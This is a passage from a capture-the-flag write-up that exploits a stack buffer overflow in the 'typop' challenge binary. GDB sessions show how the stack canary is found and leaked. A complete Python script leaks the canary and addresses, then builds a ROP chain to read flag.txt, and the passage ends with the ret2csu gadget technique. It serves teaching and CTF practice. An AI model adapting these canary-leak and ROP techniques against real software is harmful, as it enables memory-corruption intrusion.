   0x00000000000013e3 <+155>:	lea    -0x12(%rbp),%rax
   0x00000000000013e7 <+159>:	mov    $0x5a,%edx
   0x00000000000013ec <+164>:	mov    %rax,%rsi
   0x00000000000013ef <+167>:	mov    $0x0,%edi
   0x00000000000013f4 <+172>:	call   0x1100 <read@plt>
   0x00000000000013f9 <+177>:	nop
   0x00000000000013fa <+178>:	mov    -0x8(%rbp),%rax
   0x00000000000013fe <+182>:	xor    %fs:0x28,%rax
   0x0000000000001407 <+191>:	je     0x140e <getFeedback+198>
   0x0000000000001409 <+193>:	call   0x10e0 <__stack_chk_fail@plt>
   0x000000000000140e <+198>:	leave  
   0x000000000000140f <+199>:	ret    
End of assembler dump.

The emphasized code above saves a value onto the stack (known as the canary or a cookie) and then verifies that it hasn't been modified before returning from the function. If the check fails, it aborts the entire program, ensuring no exploit is possible in the event that the stack has been modified.

We can attempt a buffer overflow and watch our values clobber the canary and trigger the check to fail:

(gdb) break *getFeedback+172
Breakpoint 1 at 0x13f4
(gdb) break *getFeedback+177
Breakpoint 2 at 0x13f9
(gdb) c
The program is not being run.
(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?

Breakpoint 1, 0x0000560f656e23f4 in getFeedback ()
(gdb) x/6gx $rsp
0x7ffdc5e03da0:	0x0000000000000000	0x0a797f30af40db02
0x7ffdc5e03db0:	0x0000000000000000	0xefecc9babcf8fc00
0x7ffdc5e03dc0:	0x00007ffdc5e03dd0	0x0000560f656e2447
(gdb) c
Continuing.
#################

Breakpoint 2, 0x0000560f656e23f9 in getFeedback ()
(gdb) x/6gx $rsp
0x7ffdc5e03da0:	0x0000000000000000	0x23237f30af40db02
0x7ffdc5e03db0:	0x2323232323232323	0x0a23232323232323
0x7ffdc5e03dc0:	0x00007ffdc5e03dd0	0x0000560f656e2447
(gdb) c
Continuing.
*** stack smashing detected ***: terminated

Program received signal SIGABRT, Aborted.
__GI_raise (sig=sig@entry=6) at ../sysdeps/unix/sysv/linux/raise.c:50
50	../sysdeps/unix/sysv/linux/raise.c: No such file or directory.

Here we overwrote the canary value with 7 '#' characters (ordinal 0x23) and 1 newline character (ordinal 0xa). This caused the canary check to fail and crash the program.

This canary value is randomly generated every time a new process starts, making it difficult to guess. However, it doesn't change once initialized, we can leak part of it in the getFeedback output, and we can take advantage of the main loop to make more passes as necessary to get past any NUL byte values in the output.

As a side note, what's with the bytes looking out of order? GDB displays memory from lower addresses downwards to higher addresses, and in the previous display I asked for it to show 8-byte integer values. Intel computers are little-endian, so multi-byte values start with the little end and increase to the big end (the front of the number). This means the values in the individual numbers are actually reversed from how they're laid out in memory. We can ask GDB to show us individual bytes to see their exact order in memory:

(gdb) run
Starting program: /home/james/src/idekctf-typop/attachments/chall 
Do you want to complete a survey?
y
Do you like ctf?
y
You said: y

That's great! Can you provide some extra feedback?

Breakpoint 1, 0x0000562f267f43f4 in getFeedback ()
(gdb) x/48bx $rsp
0x7fff351839d0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839d8:	0x02	0x2b	0x62	0x8a	0xa8	0x7f	0x79	0x0a
0x7fff351839e0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839e8:	0x00	0xa4	0x6d	0xc2	0x18	0xb1	0x64	0x38
0x7fff351839f0:	0x00	0x3a	0x18	0x35	0xff	0x7f	0x00	0x00
0x7fff351839f8:	0x47	0x44	0x7f	0x26	0x2f	0x56	0x00	0x00
(gdb) x/6gx $rsp
0x7fff351839d0:	0x0000000000000000	0x0a797fa88a622b02
0x7fff351839e0:	0x0000000000000000	0x3864b118c26da400
0x7fff351839f0:	0x00007fff35183a00	0x0000562f267f4447
(gdb) c
Continuing.
#########

Breakpoint 2, 0x0000562f267f43f9 in getFeedback ()
(gdb) x/48bx $rsp
0x7fff351839d0:	0x00	0x00	0x00	0x00	0x00	0x00	0x00	0x00
0x7fff351839d8:	0x02	0x2b	0x62	0x8a	0xa8	0x7f	0x23	0x23
0x7fff351839e0:	0x23	0x23	0x23	0x23	0x23	0x23	0x23	0x0a
0x7fff351839e8:	0x00	0xa4	0x6d	0xc2	0x18	0xb1	0x64	0x38
0x7fff351839f0:	0x00	0x3a	0x18	0x35	0xff	0x7f	0x00	0x00
0x7fff351839f8:	0x47	0x44	0x7f	0x26	0x2f	0x56	0x00	0x00
(gdb) x/6gx $rsp
0x7fff351839d0:	0x0000000000000000	0x23237fa88a622b02
0x7fff351839e0:	0x0a23232323232323	0x3864b118c26da400
0x7fff351839f0:	0x00007fff35183a00	0x0000562f267f4447

Try not to get confused.

Also notice how the canary value ends with 0x00? This causes the canary value to be laid out in memory with a leading NUL byte that protects it from being leaked by accidentally passing adjacent strings in the stack that are missing a terminating NUL byte into various standard string output functions.

We can utilize the first buffer overflow in getFeedback to leak out the stack canary from the output of printf until we have the full value. Then we can keep going until we also get the stack address and the return address.

We now have all the pieces and the strategy we need to craft an attack.

Scripting an Attack in Python

Note: you can read the complete python source for my solution here.

We'll start by creating some boilerplate code to run and interact with a subprocess. We'll use ./chall for now, but we can change it to later once we've finished.

#!/usr/bin/env python

import sys
import subprocess

EXPLOITED_BUFFER_SIZE = 10
GETFEEDBACK_READ1_SIZE = 30
WIN_FOPEN_OFFSET = -411
RBP_ROP_OFFSET = -532
FLAG_STACK_OFFSET = 0x4a

def attack(cmd, skiplines=0):
    p = subprocess.Popen(cmd, shell=True, stdin=subprocess.PIPE,
                         stdout=subprocess.PIPE, close_fds=True)
    print('Started', cmd, 'with pid', p.pid)

    # convenience function for showing output from the subprocess
    def echo(display=True):
        line = p.stdout.readline()
        if display and line:
            sys.stdout.write('server> ')
            sys.stdout.write(line.decode('utf-8'))
            sys.stdout.flush()
        return line
    for _ in range(skiplines):
        echo()
    # Remaining code goes here

if __name__ == '__main__':
    attack('./chall')

This code sets up a subprocess that we can interact with to read and send bytes. I also print out the current pid so we can add import pdb; pdb.set_trace() to our code and attach gdb to the running process before continuing. Finally, I had a little helper for simply echoing or discarding lines of content from the subprocess.

I also went ahead and made some named constants for all the magic numbers we distilled in our analysis and debugging sessions.

Now that we have the process up and running, we can try to apply what we've learned so far to leak the stack canary, the parent frame's stack address, and the return address:

    padding = b'#'*EXPLOITED_BUFFER_SIZE
    leaked_data = b'\x00' # we know the canary always has a leading NUL
    while len(leaked_data) + EXPLOITED_BUFFER_SIZE <= GETFEEDBACK_READ1_SIZE:
        # Do you want to complete a survey?
        echo(False)
        p.stdin.write(b'y\n')
        p.stdin.flush()

        # Do you like ctf?
        echo(False)
        filler = padding + b'#'*len(leaked_data)
        p.stdin.write(filler)
        p.stdin.flush()

        # You said: {filler}{additional_leaked_data}
        data = p.stdout.readline()
        offset = data.find(b'#') + EXPLOITED_BUFFER_SIZE + len(leaked_data)
        leaked_data += data[offset:-1]

        # That's great! Can you provide some feedback?
        echo(False)
        p.stdin.write(padding + leaked_data)
        p.stdin.flush()

        # We know the leaked data terminates with a NUL byte
        leaked_data += b'\x00'

This leaks the maximum amount of stack data possible with the size attribute passed into the read call in getFeedback. We have to loop because some of the values we're leaking may have NUL bytes in them that stop printf from printing more values.

At this point, it's useful to print out the values we've leaked for debugging purposes.

    canary = int.from_bytes(leaked_data[0:8], 'little')
    print("Canary found:", hex(canary))
    stack_address = int.from_bytes(leaked_data[8:16], 'little')
    print("Return stack address found:", hex(stack_address))
    # Note: read doesn't have a large enough size argument for us to always leak
    # enough data, but we assume we leak enough for this to work padded with 0s
    return_address = int.from_bytes(leaked_data[16:24], 'little')
    print("Return address found:", hex(return_address))

Now we can construct our ROP chain and stack data for our attack payload:

    payload = canary.to_bytes(8, 'little')
    payload += stack_address.to_bytes(8, 'little')
    payload += (return_address + RBP_ROP_OFFSET).to_bytes(8, 'little')
    payload += (stack_address + 16 + FLAG_STACK_OFFSET).to_bytes(8, 'little')
    payload += (return_address + WIN_FOPEN_OFFSET).to_bytes(8, 'little')
    # Put the flag path here
    payload += b'flag.txt\x00'

This is exactly what we demonstrated in GDB before as a proof of concept, with the addition of the stack canary.

Finally, we add the code to execute our attack:

    # Do you want to complete a survey?
    echo()
    p.stdin.write(b'y\n')
    p.stdin.flush()

    # Do you like ctf?
    echo()
    p.stdin.write(b'y\n')
    p.stdin.flush()

    # You said: y
    echo()

    # That's great! Can you provide some feedback?
    echo()
    p.stdin.write(padding + payload)
    p.stdin.flush()

    while not p.poll():
        out = echo()
    print()

It's important at this point to remember that we'll only see output that we echo from our subprocess. Don't forget to output the flag here! We need to capture and print any remaining output from the subprocess before it crashes.

Finally, we can give it a go:

$ python ./attack.py
Started ./chall with pid 39587
Canary found: 0x1eaf69b1bc4b7000
Return stack address found: 0x7ffe1e1cee30
Return address found: 0x56371d96a447
server> Do you want to complete a survey?
server> Do you like ctf?
server> You said: y
server>
server> That's great! Can you provide some extra feedback?
*** stack smashing detected ***: terminated
server> idek{REDACTED}
server>

Our subprocess still crashed, but not before giving us the flag!

Conclusion and Alternatives

While the method I used to capture the flag worked, it was very specific to the implementation of win() along with a bit of luck. After the CTF ended I decided to investigate some other possibilities and discovered a useful set of ROP gadgets discovered and published in a 2018 presentation by Gisbert and Ripoll-Ripoll.

You can watch the presentation here, but I skipped right to the paper (my kids are too loud for me to be watching anything, but the paper is really good, trust me!).

Gisbert and Ripoll found two particular gadgets in __libc_csu_init that turn out to be present on most Linux binaries. Combined, these provide enough code to execute any function up to three arguments using the x86-64 System V ABI.

Looking at the functions in chall, we can see that __libc_csu_init is present. Disassembling it shows that it still contains the ROP gadgets utilized by the method in the paper:

(gdb) info functions ^__libc_csu
All functions matching regular expression "^__libc_csu":

Non-debugging symbols:
0x0000000000001470  __libc_csu_init
0x00000000000014e0  __libc_csu_fini
(gdb) disas __libc_csu_init
Dump of assembler code for function __libc_csu_init:
   0x0000000000001470 <+0>:     endbr64
   0x0000000000001474 <+4>:     push   %r15
   0x0000000000001476 <+6>:     lea    0x28fb(%rip),%r15        # 0x3d78
   0x000000000000147d <+13>:    push   %r14
   0x000000000000147f <+15>:    mov    %rdx,%r14
   0x0000000000001482 <+18>:    push   %r13
   0x0000000000001484 <+20>:    mov    %rsi,%r13
   0x0000000000001487 <+23>:    push   %r12
   0x0000000000001489 <+25>:    mov    %edi,%r12d
   0x000000000000148c <+28>:    push   %rbp
   0x000000000000148d <+29>:    lea    0x28ec(%rip),%rbp        # 0x3d80
   0x0000000000001494 <+36>:    push   %rbx
   0x0000000000001495 <+37>:    sub    %r15,%rbp
   0x0000000000001498 <+40>:    sub    $0x8,%rsp
   0x000000000000149c <+44>:    call   0x1000 <_init>
   0x00000000000014a1 <+49>:    sar    $0x3,%rbp
   0x00000000000014a5 <+53>:    je     0x14c6 <__libc_csu_init+86>
   0x00000000000014a7 <+55>:    xor    %ebx,%ebx
   0x00000000000014a9 <+57>:    nopl   0x0(%rax)
   0x00000000000014b0 <+64>:    mov    %r14,%rdx
   0x00000000000014b3 <+67>:    mov    %r13,%rsi
   0x00000000000014b6 <+70>:    mov    %r12d,%edi
   0x00000000000014b9 <+73>:    call   *(%r15,%rbx,8)
   0x00000000000014bd <+77>:    add    $0x1,%rbx
   0x00000000000014c1 <+81>:    cmp    %rbx,%rbp
   0x00000000000014c4 <+84>:    jne    0x14b0 <__libc_csu_init+64>
   0x00000000000014c6 <+86>:    add    $0x8,%rsp
   0x00000000000014ca <+90>:    pop    %rbx
   0x00000000000014cb <+91>:    pop    %rbp
   0x00000000000014cc <+92>:    pop    %r12
   0x00000000000014ce <+94>:    pop    %r13
   0x00000000000014d0 <+96>:    pop    %r14
   0x00000000000014d2 <+98>:    pop    %r15
   0x00000000000014d4 <+100>:   ret

With these gadgets, we can now easily set the original arguments to win from values in the stack.

To do so, first call the gadget at 0x14ca to set %r12 to 'f', %r13 to 'l', %r14 to 'a'. You also have to set %rbx and %r15 so that the call instruction at 0x14b9 will calculate the address of win.

Second, call the gadget at 0x14b0 which then moves values from the registers set by the previous gadget into the correct registers to be considered the first three arguments to win.

In fact, you can call any function of up to 3 arguments using these two gadgets together like this.

While I appreciate the generic power of this return to csu technique, I actually prefer the simplicity of my own carefully crafted ROP chain in this particular case. Nevertheless, I plan to use return to csu in the future!